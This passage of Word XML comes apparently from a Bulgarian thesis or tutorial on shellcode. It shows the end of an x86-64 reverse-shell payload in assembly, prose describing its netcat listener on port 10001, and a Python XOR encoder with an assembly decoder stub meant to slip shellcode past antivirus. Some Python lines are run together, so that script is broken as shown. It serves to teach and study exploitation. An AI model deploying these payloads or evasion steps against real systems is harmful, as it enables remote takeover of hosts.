    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>movb $33, %al</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>syscall</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>movb $1, %sil</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>xorl %eax, %eax</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>movb $33, %al</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>syscall</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>movb $2, %sil</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>xorl %eax, %eax</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>movb $33, %al</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>syscall</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>xorl %eax, %eax</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t># stack is executable, i can do this</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>movb %al, eol(%rip)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>leaq sh(%rip), %rdi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t># sys_execve</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>movb $59, %al</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>xorl %edx, %edx</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>xorl %esi, %esi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>syscall</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>xorl %eax, %eax</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>movb $60, %al</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>xorl %edi, %edi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>syscall</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRDefault="005F56EB" w:rsidP="00DD0DC6">
      <w:pPr>
        <w:pStyle w:val="figuretext"/>
      </w:pPr>
      <w:bookmarkStart w:id="68" w:name="_Ref2190444"/>
      <w:r>
        <w:t xml:space="preserve">Фигура </w:t>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> STYLEREF 1 \s </w:instrText>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="005F5FC6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:noBreakHyphen/>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Фигура \* ARABIC \s 1 </w:instrText>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="005F5FC6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Reverse shell</w:t>
      </w:r>
      <w:bookmarkEnd w:id="68"/>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00CF6AEC">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve">Този шелкод е значително по-сложен и размерът му го отразява - 132 байта. За отдалеченото котролиране на shell трябва да се установи мрежова </w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">връзка. За безпроблемна работа се отваря TCP сесия на даден порт, в случая 10001, който трябва да бъде преобразуван в big endian. След като връзката е установена, резултатният сокет трябва да бъде копиран на стандартен вход и изход - номерирани 0 и 1. Отново за допълнителна сигурност може да се извика </w:t>
      </w:r>
      <w:r w:rsidRPr="00532C4C">
        <w:rPr>
          <w:rStyle w:val="codeChar"/>
        </w:rPr>
        <w:t>exit()</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve"> накрая. За този шелкод трябва и сървър, който може да се създаде с команда </w:t>
      </w:r>
      <w:r w:rsidRPr="00543FBF">
        <w:rPr>
          <w:rStyle w:val="codeChar"/>
        </w:rPr>
        <w:t>netcat -vkl 10001</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t>. След създаване на връзка, могат да се пишат команди.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00CF6AEC">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve">От двете шелкод реализации личи, че те взаимстват код, например </w:t>
      </w:r>
      <w:r w:rsidRPr="00B4067A">
        <w:rPr>
          <w:rStyle w:val="codeChar"/>
        </w:rPr>
        <w:t>exit()</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t>. Поради липсата на стандартната библиотека споделянето на код е трудно и промени в единия не се отразяват в другия код.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="008227E1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="69" w:name="_c7e6iig7h1u6" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="70" w:name="_Toc3540773"/>
      <w:bookmarkEnd w:id="69"/>
      <w:r w:rsidRPr="00112660">
        <w:t>Xor encoder</w:t>
      </w:r>
      <w:bookmarkEnd w:id="70"/>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00CF6AEC">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>Класическото кодиране е с метода xor. Операцията xor има свойството, че ако на една стойност бъде приложена логическа функция/операция xor с една и съща друга стойност два пъти, резултатът е първоначалната стойност. Например, ако байтовете “\xff\x8a\x05\xf9\xff\xff” бъдат кодирани с ключа “0xf” се получава “\xf0\x85\x0a\xf6\xf0\xf0”. Ако повторим операцията, се получават първоначалните байтове - “\xff\x8a\x05\xf9\xff\xff”. Основен недостатък е, че този метод е лесен за разбиване и антивирусните програми могат да го разпознават. Примерен метод е честотен анализ - въпреки че кодирането прави оригиналната информация неразбираема, тя трансформира еднаква поредност от n байтове (0xff), в една и съща друга (0xf0). Това свойство позволява преброяване на всички еднакви символи и честотата на всяка комбинация може да бъде съотнесена със съответната буква. Въпреки това методът е добро начало.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00CF6AEC">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>Първата стъпка в реализацията е кодиране на шелкод. Това става лесно със следния скрипт:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>import sys</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve">shellcode = sys.argv[1] </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve">shellcode = shellcode.encode('ascii').decode('unicode-escape').encode('latin-1') xored = [] </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve">key = 15 for byte in shellcode: xored.append(byte ^ key) </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve">print(f'Number of bytes: {len(xored)}') </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve">xored = ', '.join('0x{:02x}'.format(b) for b in xored) </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve">print(xored) </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRDefault="005F56EB" w:rsidP="00DD0DC6">
      <w:pPr>
        <w:pStyle w:val="figuretext"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Фигура </w:t>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> STYLEREF 1 \s </w:instrText>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="005F5FC6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:noBreakHyphen/>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Фигура \* ARABIC \s 1 </w:instrText>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="005F5FC6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>: xor_encode.py</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00CF6AEC">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:lastRenderedPageBreak/>
        <w:t>Изходът</w:t>
      </w:r>
      <w:r w:rsidRPr="00326004">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>ѝ</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve"> е новият кодиран шелкод, който можем да вградим в декодираща програма. Това е възможно със следната програма:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>key:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>.byte 0x0f</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>shellcode:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>.byte 0xf0, 0x85, 0x0a, 0xf6, 0xf0, 0xf0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>_start:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>movb key(%rip), %bl</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>xorl %eax, %eax</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve"> loop:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>leaq shellcode(%rip), %rcx</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>addq %rax, %rcx</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>xorb %bl, (%rcx)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>inc %ax</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>cmpw $69, %ax</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>jl loop</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00CF6AEC" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>jmp shellcode</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRDefault="005F56EB" w:rsidP="00DD0DC6">
      <w:pPr>
        <w:pStyle w:val="figuretext"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Фигура </w:t>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> STYLEREF 1 \s </w:instrText>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="005F5FC6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:noBreakHyphen/>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Фигура \* ARABIC \s 1 </w:instrText>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="005F5FC6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
        <w:t>Декодираща програма (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xor_shell.s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00CF6AEC">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>Процесът е неудобен, защото се състои от две стъпки и не може да бъде записан в един файл. Затова е подходящ скрипт за автоматизация на процеса.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="008227E1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="71" w:name="_rja1rcrooeds" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="72" w:name="_Ref2190565"/>
      <w:bookmarkStart w:id="73" w:name="_Toc3540774"/>
      <w:bookmarkEnd w:id="71"/>
      <w:r w:rsidRPr="008227E1">
        <w:t>Тест</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve"> за директно изпълнение</w:t>
      </w:r>
      <w:bookmarkEnd w:id="72"/>
      <w:bookmarkEnd w:id="73"/>
    </w:p>
